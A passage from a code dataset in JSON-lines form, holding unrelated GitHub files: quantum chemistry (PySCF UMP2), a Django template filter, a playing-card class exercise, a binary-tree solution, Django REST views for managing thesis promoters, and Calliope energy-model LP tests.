numpy.hstack((mo_energy[0][mo_occ[0]>0] ,mo_energy[1][mo_occ[1]>0]))\n ev = numpy.hstack((mo_energy[0][mo_occ[0]==0],mo_energy[1][mo_occ[1]==0]))\n no = o.shape[1]\n nv = v.shape[1]\n noa = sum(mo_occ[0]>0)\n nva = sum(mo_occ[0]==0)\n eri = ao2mo.general(mol, (o,v,o,v)).reshape(no,nv,no,nv)\n eri[:noa,nva:] = eri[noa:,:nva] = eri[:,:,:noa,nva:] = eri[:,:,noa:,:nva] = 0\n g = eri - eri.transpose(0,3,2,1)\n eov = eo.reshape(-1,1) - ev.reshape(-1)\n de = 1/(eov.reshape(-1,1) + eov.reshape(-1)).reshape(g.shape)\n emp2 = .25 * numpy.einsum('iajb,iajb,iajb->', g, g, de)\n return emp2\n\ne = myump2(mol, m.mo_energy, m.mo_coeff, m.mo_occ)\nprint('E(UMP2) = %.9g, ref = -0.346926068' % e)\n\n","repo_name":"pyscf/pyscf","sub_path":"examples/ao2mo/11-ump2.py","file_name":"11-ump2.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1031,"dataset":"github-code","pt":"94"} +{"seq_id":"32034467319","text":"from django import template\n\nregister = template.Library()\n\n\n@register.filter\ndef chunkify(seq, size):\n \"\"\"\n Break up a given list in sub-lists of the given size.\n \"\"\"\n for i in range(0, len(seq), size):\n yield seq[i:i+size]\n","repo_name":"djangocon/2016.djangocon.eu","sub_path":"djangocon/tplutils/templatetags/chunkify.py","file_name":"chunkify.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"} +{"seq_id":"31377424187","text":"\"\"\"\n03/30/2020\n\nFor this program I reused the class PlayingCard from Assignment #9. This is an object oriented program, with instance\nvariables, class variables, and sorts a list the easy way. The program has a defined class where one object of the class\nrepresents one playing card. The program executes code and test a reusable class. This program calculates a comment for\nthe PlayingCard class and for every method in the class. This program has seven methods. This test program thoroughly\ntests all methods inside class PlayingCard. This program demonstrates additional practice with dictionaries. The class\nPlayingCard has a comment that states what one object of class PlayingCard represents. Every method in class PlayingCard\nhas a comment that tells what the method does or returns. The dictionary translates from rank numbers and suit letters\nto words are class variables. Methods _eq__() and __lt__() return the correct value and contains a comment. The test\nprogram contains a list of PlayingCard objects, calls a built-in sort function to sort the list of PlayingCard objects,\nand test both _eq__() and __lt__() methods thoroughly before proceeding. Plus, a class decorator @total_ordering was added\nto class PlayingCard. The main program includes five PlayingCard objects, are placed into a Python list, and\nsorts the list using sorted() which are built into Python. The test code submitted includes at least one direct test\nof each of the new comparison methods, using the symbols \"==\" and \"<\".\n\"\"\"\n\n# My Program\nimport functools\n\nget_name = {}\nget_name[1] = 'Ace'\nget_name[2] = 'Two'\nget_name[3] = 'Three'\nget_name[4] = 'Four'\nget_name[5] = 'Five'\nget_name[6] = 'Six'\nget_name[7] = 'Seven'\nget_name[8] = 'Eight'\nget_name[9] = 'Nine'\nget_name[10] = 'Ten'\nget_name[11] = 'Jack'\nget_name[12] = 'Queen'\nget_name[13] = 'King'\n\nget_suit = {}\nget_suit['c'] = \"Clubs\"\nget_suit['d'] = \"Diamonds\"\nget_suit['h'] = \"Hearts\"\nget_suit['s'] = \"Spades\"\n\nget_rank = {}\nget_rank['Clubs'] = 4\nget_rank['Diamonds'] = 3\nget_rank['Hearts'] = 2\nget_rank['Spades'] = 1\n\n\n@functools.total_ordering\nclass PlayingCard:\n '''\n This class describes the rank and suit of the playing card. The rank is a number in the range 1-13 (indicating\n the ranks Ace through King, and suit is a single character \"d\" \"c\", \"h\", or \"s\" indicating the suit (diamonds,\n clubs, hearts, or spades).\n '''\n\n def __init__(self, rank, suit):\n self.rank = rank\n self.suit = suit\n\n def getRank(self):\n '''\n This class returns the rank of the card as a number.\n '''\n return self.rank\n\n def getSuit(self):\n '''\n This class returns the suit of the card as a word.\n '''\n return get_suit[self.suit]\n\n def bjValue(self):\n '''\n This class returns the Blackjack value of a card. Ace has a blackjack value of 1, face cards all have blackjack\n value 10. The rest of the cards have blackjack values that are the same as their rank. The returned value from\n this method will always be a number.\n '''\n if self.rank < 10:\n return self.rank\n else:\n return 10\n\n def __str__(self):\n '''\n This class returns a string containing the full name of the card.\n '''\n return '{} of {}'.format(get_name[self.getRank()], self.getSuit())\n\n def __eq__(self, other):\n '''\n This class returns True if an existing playing card has the same rank and the same suit as the object \"other\"\n that is sent in as parameter.\n '''\n if self.getSuit() == other.getSuit() and self.getRank() == other.getRank():\n return True\n else:\n return False\n\n def __lt__(self, other):\n '''\n This class returns True if an existing object is less than the object \"other\" that is sent in as parameter,\n returns False otherwise.\n '''\n if get_rank[self.getSuit()] < get_rank[other.getSuit()]:\n return True\n elif get_rank[self.getSuit()] > get_rank[other.getSuit()]:\n return False\n else:\n if self.getRank() < other.getRank():\n return True\n else:\n return False\n\n\n# Below is the test program that creates and sorts five cards.\n\nc1 = PlayingCard(5, \"c\") # constructs the Card object\nc2 = PlayingCard(13, \"h\") # constructs the Card object\nc3 = PlayingCard(13, \"c\") # constructs the Card object\nc4 = PlayingCard(10, \"s\") # constructs the Card object\nc5 = PlayingCard(7, \"d\") # constructs the Card object\n\nlst = [c1, c2, c3, c4, c5]\nsorted_lst = sorted(lst)\nfor card in sorted_lst:\n print(card)\n\nprint(c2 == c3)\nprint(c1 < c3)\n\n# This is the actual output generated by the program above.\n\"\"\"\nTen of Spades\nKing of Hearts\nSeven of Diamonds\nFive of Clubs\nKing of Clubs\nFalse\nTrue\n\nProcess finished with exit code 0\n\"\"\"\n","repo_name":"acastillosanchez/Foothill-CS3A-Python","sub_path":"assignment10_GitHub.py","file_name":"assignment10_GitHub.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29242371054","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def levelOrder(self, root: TreeNode) -> List[List[int]]:\n if not root:\n return []\n \n def dfs(node, depth, res):\n if not node:\n return\n if depth >= len(res):\n res.append([])\n res[depth].append(node.val)\n dfs(node.left, depth + 1, res)\n dfs(node.right, depth + 1, res)\n \n res = []\n dfs(root, 0, res)\n return res\n","repo_name":"snowan/interviews","sub_path":"2021/python/102.binary-tree-level-order-traverse.py","file_name":"102.binary-tree-level-order-traverse.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"39659242806","text":"from rest_framework import generics, mixins, status\nfrom core.api.serializers import promoter as promoterSerializers\nfrom core.api.serializers import file as fileSerializers\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom core.permissions import IsAdministratorOrDeanWorker, IsStudent, IsStudentOfRecordFromUrl\nfrom rest_framework.response import Response\nfrom core.models import Promoter, Student, Record\nfrom django.db.models.query_utils import Q\nfrom core.my_functions import have_free_place, are_assigned_to_themselves, normalize_string\nfrom django.http import Http404\nimport io\nimport csv\n\n\n# Views associated with User model with promoter role\n\n\nclass PromoterBulkDelete(generics.CreateAPIView):\n serializer_class = promoterSerializers.PromoterBulkDeleteSerializer\n permission_classes = (IsAuthenticated & IsAdministratorOrDeanWorker,)\n # permission_classes = [AllowAny]\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(\n data=request.data, many=True, context={'request': request})\n serializer.is_valid(raise_exception=True)\n list_of_ids = []\n for promoter_data in serializer.validated_data:\n list_of_ids.append(promoter_data[\"id\"])\n users_to_delete = Promoter.objects.filter(id__in=list_of_ids)\n if (len(users_to_delete) <= 0):\n return Response({'message': \"Couldn't find promoters to delete\", }, status=status.HTTP_400_BAD_REQUEST)\n else:\n users_to_delete.delete()\n return Response({\n 'message': \"Promoters successfully deleted\"\n })\n\n\nclass PromoterBulkRegister(generics.CreateAPIView):\n serializer_class = fileSerializers.FileAddSerializer\n permission_classes = (IsAuthenticated & IsAdministratorOrDeanWorker,)\n # permission_classes = [AllowAny]\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(\n data=request.data, context={'request': request})\n serializer.is_valid(raise_exception=True)\n file = serializer.validated_data['file']\n file_extension = str(file).split('.').pop()\n if (file_extension != 'csv'):\n return Response({'message': \"Wrong file extension\", }, status=status.HTTP_400_BAD_REQUEST)\n decoded_file = file.read().decode('utf-8-sig')\n io_string = io.StringIO(decoded_file)\n reader = csv.reader(io_string, delimiter=';')\n promoters = []\n for i, row in enumerate(reader):\n if i == 0:\n pass\n else:\n if len(row) != 9:\n return Response({'message': \"Wrong file structure\", }, status=status.HTTP_400_BAD_REQUEST)\n fn_wo_accents = normalize_string(row[1])\n ln_wo_accents = normalize_string(row[2])\n # Password (without accents) = last name + sign @ + additional chars from first column of file\n password = ln_wo_accents+'@'+row[0]\n try:\n max_students_number = int(row[4])\n except ValueError:\n return Response({'message': \"Błąd konwersji danych\", }, status=status.HTTP_400_BAD_REQUEST)\n else:\n obj = {\n 'user': {\n # Email (without accents) = first letter lowercased letter from name + lowercased last name + @uwm.pl\n 'email': fn_wo_accents[0].lower()+ln_wo_accents.lower()+'@uwm.pl',\n 'first_name': row[1],\n 'last_name': row[2],\n 'password': password,\n 'password2': password\n },\n 'title': row[3],\n 'max_students_number': int(row[4]),\n 'proposed_topics': row[5],\n 'unwanted_topics': row[6],\n 'interests': row[7],\n 'contact': row[8]\n }\n promoter = promoterSerializers.PromoterRegisterSerializer(\n data=obj)\n promoter.is_valid(raise_exception=True)\n promoters.append(obj)\n\n if (i == len(promoters)):\n for promoterData in promoters:\n promoter = promoterSerializers.PromoterRegisterSerializer(\n data=promoterData)\n promoter.is_valid(raise_exception=False)\n promoter.save()\n return Response({\n 'message': \"Promoters successfully registered\"\n })\n\n\nclass PromoterRegister(generics.CreateAPIView):\n serializer_class = promoterSerializers.PromoterRegisterSerializer\n permission_classes = (IsAuthenticated & IsAdministratorOrDeanWorker,)\n # permission_classes = [AllowAny]\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.save()\n return Response({\n 'message': \"Successfully registered a promoter\",\n 'user': {\n 'email': user.email,\n 'first_name': user.first_name,\n 'last_name': user.last_name,\n 'role': user.role,\n },\n })\n\n\nclass PromoterList(generics.ListAPIView):\n serializer_class = promoterSerializers.PromoterUserListSerializer\n permission_classes = (IsAuthenticated,)\n # permission_classes = [AllowAny]\n\n def get_queryset(self):\n user = self.request.user\n # If user is an administrator, he is able to see all promoters (even with User.active=False)\n if (user.role == 1):\n return Promoter.objects.all().order_by('-title', 'user__first_name', 'user__last_name')\n else:\n # If not - user see only promoters, who have active account\n return Promoter.objects.filter(Q(user__active=True)).order_by('-title', 'user__first_name', 'user__last_name')\n\n\nclass PromoterDetail(generics.RetrieveUpdateDestroyAPIView):\n\n def get_serializer_class(self):\n if self.request.method == 'GET':\n return promoterSerializers.PromoterUserDetailWithFilesSerializer\n else:\n return promoterSerializers.PromoterUserDetailForAdminAndDeanWorkerSerializer\n\n def get_permissions(self):\n if self.request.method == 'GET':\n # Everyone who is logged are able to see promoter details\n return [IsAuthenticated(), ]\n else:\n # Only logged users with administrator, dean_worker role can change informations about specified promoter\n return [IsAuthenticated(), IsAdministratorOrDeanWorker(), ]\n\n def get_queryset(self):\n user = self.request.user\n # If user is an administrator, he is able to see all promoters (even with User.active=False)\n if (user.role == 1):\n return Promoter.objects.all()\n else:\n # If not - User see only promoters, who have active account\n return Promoter.objects.filter(Q(user__active=True))\n\n\nclass PromoterListForRecord(generics.ListAPIView):\n serializer_class = promoterSerializers.PromoterUserListSerializer\n permission_classes = (IsAuthenticated & IsStudent &\n IsStudentOfRecordFromUrl,)\n # permission_classes = [AllowAny]\n\n def get_queryset(self):\n record_id = self.kwargs.get('pk')\n if Record.objects.get(pk=record_id).was_revoked is True:\n raise Http404\n else:\n # Students are able to see only promoters, who have active account, have empty place for new student,\n # and actual student didn't choose them as preference in assigned records\n active_promoters = Promoter.objects.filter(Q(user__active=True))\n queryset = active_promoters\n user = self.request.user\n logged_student = Student.objects.get(user=user)\n for active_promoter in active_promoters:\n if ((have_free_place(promoter=active_promoter) == False) or (are_assigned_to_themselves(active_promoter, logged_student) == True)):\n queryset = queryset.exclude(id=active_promoter.id)\n return queryset.order_by('-title', 'user__first_name', 'user__last_name')\n\n\nclass PromoterDetailForRecord(mixins.RetrieveModelMixin, mixins.CreateModelMixin, generics.GenericAPIView):\n serializer_class = promoterSerializers.PromoterUserDetailWithFilesSerializer\n permission_classes = (IsAuthenticated & IsStudent &\n IsStudentOfRecordFromUrl,)\n # permission_classes = [AllowAny];\n\n def get_object(self):\n record_id = self.kwargs.get('pk')\n if Record.objects.get(pk=record_id).was_revoked is True:\n raise Http404\n else:\n # Students are able to see only promoters, who have active account, have empty place for new student,\n # and actual student didn't choose them as preference in assigned records\n promoter_id = self.kwargs.get('pk_2')\n user = self.request.user\n student = Student.objects.get(user=user)\n try:\n promoter = Promoter.objects.get(\n id=promoter_id, user__active=True)\n except Promoter.DoesNotExist:\n raise Http404\n if ((have_free_place(promoter=promoter) == True) and (are_assigned_to_themselves(promoter=promoter, student=student) == False)):\n return promoter\n else:\n raise Http404\n\n lookup_url_kwarg = 'pk_2'\n\n def get(self, request, *args, **kwargs):\n return self.retrieve(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n record_id = self.kwargs.get('pk')\n promoter_id = self.kwargs.get('pk_2')\n record = Record.objects.get(pk=record_id)\n promoter = Promoter.objects.get(pk=promoter_id)\n\n user = self.request.user\n student = Student.objects.get(user=user)\n\n if have_free_place(promoter=promoter) is False:\n return Response({\n 'message': \"This promoter hasn't got free place for new student\",\n }, status=status.HTTP_400_BAD_REQUEST)\n elif (are_assigned_to_themselves(promoter=promoter, student=student) == True):\n return Response({\n 'message': \"You already chose this promoter in one of your preferences\",\n }, status=status.HTTP_400_BAD_REQUEST)\n else:\n record.promoter = promoter\n record.save()\n return Response({\n 'message': \"Successfully added promoter on selected preference number\",\n })\n","repo_name":"tmatuszewski97/e-promotor-backend","sub_path":"ePromotor/core/api/views/promoter.py","file_name":"promoter.py","file_ext":"py","file_size_in_byte":10823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22530904578","text":"import importlib\nfrom abc import ABC, abstractmethod\nfrom pathlib import Path\nfrom typing import Optional\n\nimport numpy as np\nimport pytest\nfrom calliope import AttrDict\nfrom pyomo.repn.tests import lp_diff\n\nfrom .common.util import build_lp, build_test_model\n\nCALLIOPE_DIR: Path = importlib.resources.files(\"calliope\")\n\n\n@pytest.fixture(scope=\"class\")\ndef compare_lps(tmpdir_factory):\n def _compare_lps(model, custom_math, filename):\n lp_file = filename + \".lp\"\n generated_file = Path(tmpdir_factory.mktemp(\"lp_files\")) / lp_file\n backend = build_lp(model, generated_file, custom_math) # noqa: F841\n expected_file = Path(__file__).parent / \"common\" / \"lp_files\" / lp_file\n # Pyomo diff ignores trivial numeric differences (10 == 10.0)\n # But it does not ignore a re-ordering of components\n diff_ordered = lp_diff.load_and_compare_lp_baseline(\n generated_file.as_posix(), expected_file.as_posix()\n )\n # Our unordered comparison ignores component ordering but cannot handle\n # trivial differences in numerics (as everything is a string to it)\n diff_unordered = _diff_files(generated_file, expected_file)\n\n # If one of the above matches across the board, we're good to go.\n assert diff_ordered == ([], []) or not diff_unordered\n\n return _compare_lps\n\n\ndef _diff_files(file1, file2):\n file1_lines = file1.read_text().split(\"\\n\")\n file2_lines = file2.read_text().split(\"\\n\")\n return set(file1_lines).symmetric_difference(file2_lines)\n\n\nclass TestBaseMath:\n TEST_REGISTER: set = set()\n\n @pytest.fixture(scope=\"class\")\n def base_math(self):\n return AttrDict.from_yaml(CALLIOPE_DIR / \"math\" / \"base.yaml\")\n\n def test_flow_cap(self, compare_lps):\n self.TEST_REGISTER.add(\"variables.flow_cap\")\n model = build_test_model(\n {\n \"nodes.b.techs.test_supply_elec.constraints.flow_cap_max\": 100,\n \"nodes.a.techs.test_supply_elec.constraints.flow_cap_min\": 1,\n \"nodes.a.techs.test_supply_elec.constraints.flow_cap_max\": np.nan,\n },\n \"simple_supply,two_hours,investment_costs\",\n )\n custom_math = {\n # need the variable defined in a constraint/objective for it to appear in the LP file bounds\n \"objectives\": {\n \"foo\": {\n \"equations\": [\n {\n \"expression\": \"sum(flow_cap[techs=test_supply_elec], over=nodes)\"\n }\n ],\n \"sense\": \"minimise\",\n }\n }\n }\n compare_lps(model, custom_math, \"flow_cap\")\n\n # \"flow_cap\" is the name of the lp file\n\n def test_storage_max(self, compare_lps):\n self.TEST_REGISTER.add(\"constraints.storage_max\")\n model = build_test_model(\n scenario=\"simple_storage,two_hours,investment_costs\",\n )\n custom_math = {\n \"constraints\": {\"storage_max\": model.math.constraints.storage_max}\n }\n compare_lps(model, custom_math, \"storage_max\")\n\n def test_flow_out_max(self, compare_lps):\n self.TEST_REGISTER.add(\"constraints.flow_out_max\")\n model = build_test_model(\n {\n \"nodes.a.techs.test_supply_elec.constraints.flow_cap_min\": 100,\n \"nodes.a.techs.test_supply_elec.constraints.flow_cap_max\": 100,\n },\n \"simple_supply,two_hours,investment_costs\",\n )\n\n custom_math = {\n \"constraints\": {\"flow_out_max\": model.math.constraints.flow_out_max}\n }\n compare_lps(model, custom_math, \"flow_out_max\")\n\n def test_balance_conversion(self, compare_lps):\n self.TEST_REGISTER.add(\"constraints.balance_conversion\")\n\n model = build_test_model(\n scenario=\"simple_conversion,two_hours,investment_costs\",\n )\n custom_math = {\n \"constraints\": {\n \"balance_conversion\": model.math.constraints.balance_conversion\n }\n }\n\n compare_lps(model, custom_math, \"balance_conversion\")\n\n def test_source_max(self, compare_lps):\n self.TEST_REGISTER.add(\"constraints.source_max\")\n model = build_test_model(\n {},\n \"simple_supply_plus,resample_two_days,investment_costs\",\n )\n custom_math = {\n \"constraints\": {\"my_constraint\": model.math.constraints.source_use_max}\n }\n compare_lps(model, custom_math, \"source_max\")\n\n @pytest.mark.xfail(reason=\"not all base math is in the test config dict yet\")\n def test_all_math_registered(self, base_math):\n \"After running all the previous tests in the class, the base_math dict should be empty, i.e. all math has been tested\"\n for key in self.TEST_REGISTER:\n base_math.del_key(key)\n assert not base_math\n\n\nclass CustomMathExamples(ABC):\n TEST_REGISTER: set = set()\n\n #: source of all custom math files\n CUSTOM_MATH_DIR = CALLIOPE_DIR.parent.parent / \"doc\" / \"_static\" / \"custom_math\"\n\n @property\n @abstractmethod\n def YAML_FILEPATH(self) -> str:\n \"Source of the specific test class custom math\"\n\n @pytest.fixture(scope=\"class\")\n def abs_filepath(self):\n return (self.CUSTOM_MATH_DIR / self.YAML_FILEPATH).absolute()\n\n @pytest.fixture(scope=\"class\")\n def custom_math(self):\n return AttrDict.from_yaml(self.CUSTOM_MATH_DIR / self.YAML_FILEPATH)\n\n @pytest.fixture\n def build_and_compare(self, abs_filepath, compare_lps):\n def _build_and_compare(\n filename: str,\n scenario: str,\n overrides: Optional[dict] = None,\n components: Optional[dict[list[str]]] = None,\n ):\n if components is not None:\n for component_group, component_list in components.items():\n for component in component_list:\n self.TEST_REGISTER.add(f\"{component_group}.{component}\")\n\n custom_math = {k: v for k, v in components.items() if k != \"variables\"}\n else:\n self.TEST_REGISTER.add(f\"constraints.{filename}\")\n custom_math = {\"constraints\": [filename]}\n\n if overrides is None:\n overrides = {}\n\n model = build_test_model(\n {\"config.init.custom_math\": [abs_filepath], **overrides},\n scenario,\n )\n\n compare_lps(model, custom_math, filename)\n\n return _build_and_compare\n\n @pytest.mark.order(-1)\n def test_all_math_registered(self, custom_math):\n \"After running all the previous tests in the class, the register should be full, i.e. all math has been tested\"\n for key in self.TEST_REGISTER:\n if custom_math.get_key(key, default=None) is not None:\n custom_math.del_key(key)\n assert not custom_math\n\n\n@pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `annual_flow_max`:calliope.exceptions.ModelWarning\"\n)\nclass TestAnnualEnergyBalance(CustomMathExamples):\n YAML_FILEPATH = \"annual_energy_balance.yaml\"\n\n def test_annual_energy_balance_per_tech_and_node(self, build_and_compare):\n overrides = {\n \"nodes.a.techs.test_supply_elec.constraints.annual_flow_max\": 10,\n \"nodes.b.techs.test_supply_elec.constraints.annual_flow_max\": 20,\n }\n build_and_compare(\n \"annual_energy_balance_per_tech_and_node\",\n \"simple_supply,two_hours\",\n overrides,\n )\n\n def test_annual_energy_balance_global_per_tech(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"annual_flow_max\": {\n \"data\": 10,\n \"index\": [\"test_supply_elec\"],\n \"dims\": \"techs\",\n },\n }\n }\n build_and_compare(\n \"annual_energy_balance_global_per_tech\",\n \"simple_supply,two_hours\",\n overrides,\n )\n\n def test_annual_energy_balance_global_multi_tech(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"annual_flow_max\": {\"data\": 10},\n \"flow_max_group\": {\n \"data\": True,\n \"index\": [\"test_supply_elec\", \"test_supply_plus\"],\n \"dims\": \"techs\",\n },\n }\n }\n build_and_compare(\n \"annual_energy_balance_global_multi_tech\",\n \"simple_supply_and_supply_plus,two_hours\",\n overrides,\n )\n\n def test_annual_energy_balance_total_source_availability(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"annual_source_max\": {\n \"data\": 10,\n \"index\": [\"test_supply_plus\"],\n \"dims\": \"techs\",\n },\n }\n }\n build_and_compare(\n \"annual_energy_balance_total_source_availability\",\n \"simple_supply_and_supply_plus,two_hours\",\n overrides,\n )\n\n def test_annual_energy_balance_total_sink_availability(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"annual_sink_max\": {\n \"data\": 10,\n \"index\": [\"test_demand_elec\"],\n \"dims\": \"techs\",\n },\n },\n }\n build_and_compare(\n \"annual_energy_balance_total_sink_availability\",\n \"simple_supply,two_hours,demand_elec_max\",\n overrides,\n )\n\n\nclass TestMaxTimeVarying(CustomMathExamples):\n YAML_FILEPATH = \"max_time_varying.yaml\"\n\n def test_max_time_varying_flow_cap(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"flow_cap_max_relative_per_ts\": {\n \"data\": [0.8, 0.5],\n \"index\": [\n [\"test_supply_elec\", \"2005-01-01 00:00\"],\n [\"test_supply_elec\", \"2005-01-01 01:00\"],\n ],\n \"dims\": [\"techs\", \"timesteps\"],\n },\n },\n }\n build_and_compare(\n \"max_time_varying_flow_cap\",\n \"simple_supply,two_hours\",\n overrides,\n )\n\n def test_max_time_varying_storage(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"storage_max_relative_per_ts\": {\n \"data\": [0.8, 0.5],\n \"index\": [\n [\"test_storage\", \"2005-01-01 00:00\"],\n [\"test_storage\", \"2005-01-01 01:00\"],\n ],\n \"dims\": [\"techs\", \"timesteps\"],\n },\n },\n }\n build_and_compare(\n \"max_time_varying_storage\",\n \"simple_storage,two_hours\",\n overrides,\n )\n\n\n@pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `turbine_type`:calliope.exceptions.ModelWarning\"\n)\nclass TestCHPHTP(CustomMathExamples):\n YAML_FILEPATH = \"chp_htp.yaml\"\n\n def test_chp_extraction(self, build_and_compare):\n overrides = {\n \"techs.test_chp.constraints.power_loss_factor\": 0.1,\n \"techs.test_chp.constraints.power_to_heat_ratio\": 2,\n \"techs.test_chp.constraints.energy_eff\": 0.6,\n \"techs.test_chp.constraints.turbine_type\": \"extraction\",\n }\n build_and_compare(\n \"chp_extraction\",\n \"simple_chp,two_hours\",\n overrides,\n components={\n \"constraints\": [\"chp_extraction_line\", \"chp_backpressure_line_min\"]\n },\n )\n\n def test_chp_backpressure_and_boiler(self, build_and_compare):\n overrides = {\n \"techs.test_chp.constraints.power_to_heat_ratio\": 1.5,\n \"techs.test_chp.constraints.boiler_eff\": 0.8,\n \"techs.test_chp.constraints.energy_eff\": 0.6,\n \"techs.test_chp.constraints.turbine_type\": \"backpressure\",\n }\n build_and_compare(\n \"chp_backpressure_and_boiler\",\n \"simple_chp,two_hours\",\n overrides,\n components={\n \"constraints\": [\n \"chp_divert_fuel_to_boiler\",\n \"chp_backpressure_line_max\",\n ]\n },\n )\n\n def test_chp_backpressure_no_boiler(self, build_and_compare):\n overrides = {\n \"techs.test_chp.constraints.power_to_heat_ratio\": 1.25,\n \"techs.test_chp.constraints.turbine_type\": \"backpressure\",\n }\n build_and_compare(\n \"chp_backpressure_line_equals\",\n \"simple_chp,two_hours\",\n overrides,\n )\n\n\nclass TestShareAllTimesteps(CustomMathExamples):\n YAML_FILEPATH = \"share_all_timesteps.yaml\"\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `demand_share_equals`:calliope.exceptions.ModelWarning\"\n )\n def test_demand_share_equals_per_tech(self, build_and_compare):\n overrides = {\n \"nodes.a.techs.test_supply_elec.constraints.demand_share_equals\": 0.5,\n \"nodes.b.techs.test_supply_elec.constraints.demand_share_equals\": 0.8,\n \"parameters\": {\"demand_share_tech.data\": \"test_demand_elec\"},\n }\n build_and_compare(\n \"demand_share_equals_per_tech\",\n \"simple_supply,two_hours\",\n overrides,\n )\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `supply_share_equals`:calliope.exceptions.ModelWarning\"\n )\n def test_supply_share_equals_per_tech(self, build_and_compare):\n overrides = {\n \"nodes.a.techs.test_supply_elec.constraints.supply_share_equals\": 0.5,\n \"nodes.b.techs.test_supply_elec.constraints.supply_share_equals\": 0.8,\n \"parameters\": {\"supply_share_carrier.data\": \"electricity\"},\n }\n build_and_compare(\n \"supply_share_equals_per_tech\",\n \"simple_supply_and_supply_plus,two_hours\",\n overrides,\n )\n\n\nclass TestSharePerTimestep(CustomMathExamples):\n YAML_FILEPATH = \"share_per_timestep.yaml\"\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `demand_share_per_timestep_equals`:calliope.exceptions.ModelWarning\"\n )\n def test_demand_share_per_timestep_equals_per_tech(self, build_and_compare):\n overrides = {\n \"nodes.a.techs.test_supply_elec.constraints.demand_share_per_timestep_equals\": 0.5,\n \"nodes.b.techs.test_supply_elec.constraints.demand_share_per_timestep_equals\": 0.8,\n \"parameters\": {\"demand_share_tech.data\": \"test_demand_elec\"},\n }\n build_and_compare(\n \"demand_share_per_timestep_equals_per_tech\",\n \"simple_supply,two_hours\",\n overrides,\n )\n\n @pytest.mark.filterwarnings(\n \"ignore:(?s).*defines unrecognised constraint `supply_share_per_timestep_equals`:calliope.exceptions.ModelWarning\"\n )\n def test_supply_share_per_timestep_equals_per_tech(self, build_and_compare):\n overrides = {\n \"nodes.a.techs.test_supply_elec.constraints.supply_share_per_timestep_equals\": 0.5,\n \"nodes.b.techs.test_supply_elec.constraints.supply_share_per_timestep_equals\": 0.8,\n \"parameters\": {\"supply_share_carrier.data\": \"electricity\"},\n }\n build_and_compare(\n \"supply_share_per_timestep_equals_per_tech\",\n \"simple_supply_and_supply_plus,two_hours\",\n overrides,\n )\n\n\nclass TestDemandSharePerTimestepDecision(CustomMathExamples):\n YAML_FILEPATH = \"demand_share_per_timestep_decision.yaml\"\n\n def test_demand_share_per_timestep_decision_main(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"decide_demand_share\": {\n \"data\": \"test_demand_elec\",\n \"index\": [\"test_supply_elec\", \"test_conversion_plus\"],\n \"dims\": \"techs\",\n },\n \"demand_share_carrier.data\": \"electricity\",\n \"demand_share_relaxation.data\": 0.01,\n }\n }\n build_and_compare(\n \"demand_share_per_timestep_decision_main\",\n \"conversion_and_conversion_plus,two_hours\",\n overrides,\n components={\n \"constraints\": [\n \"demand_share_per_timestep_decision_main_min\",\n \"demand_share_per_timestep_decision_main_max\",\n ],\n \"variables\": [\"demand_share_per_timestep_decision\"],\n },\n )\n\n def test_demand_share_per_timestep_decision_sum(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"decide_demand_share\": {\n \"data\": \"test_demand_elec\",\n \"index\": [\"test_supply_elec\", \"test_conversion_plus\"],\n \"dims\": \"techs\",\n },\n \"demand_share_carrier.data\": \"electricity\",\n \"demand_share_limit.data\": 0.5,\n },\n }\n build_and_compare(\n \"demand_share_per_timestep_decision_sum\",\n \"conversion_and_conversion_plus,two_hours\",\n overrides,\n )\n\n\nclass TestPiecewiseCosts(CustomMathExamples):\n YAML_FILEPATH = \"piecewise_linear_costs.yaml\"\n\n def test_piecewise(self, build_and_compare):\n overrides = {\n \"techs.test_supply_elec.constraints.lifetime\": 10,\n \"techs.test_supply_elec.costs.monetary.interest_rate\": 0.1,\n \"parameters\": {\n \"cost_flow_cap_piecewise_slopes\": {\n \"data\": [5, 7, 14],\n \"index\": [0, 1, 2],\n \"dims\": \"pieces\",\n },\n \"cost_flow_cap_piecewise_intercept\": {\n \"data\": [0, -2, -16],\n \"index\": [0, 1, 2],\n \"dims\": \"pieces\",\n },\n },\n }\n build_and_compare(\n \"piecewise_cost_investment\",\n \"supply_purchase,two_hours\",\n overrides,\n components={\n \"constraints\": [\"piecewise_costs\"],\n \"variables\": [\"piecewise_cost_investment\"],\n \"global_expressions\": [\"cost_investment\", \"cost_var\", \"cost\"],\n },\n )\n\n\nclass TestPiecewiseEfficiency(CustomMathExamples):\n YAML_FILEPATH = \"piecewise_linear_efficiency.yaml\"\n\n def test_piecewise(self, build_and_compare):\n overrides = {\n \"parameters\": {\n \"flow_eff_piecewise_slopes\": {\n \"data\": [5, 7, 14],\n \"index\": [0, 1, 2],\n \"dims\": \"pieces\",\n },\n 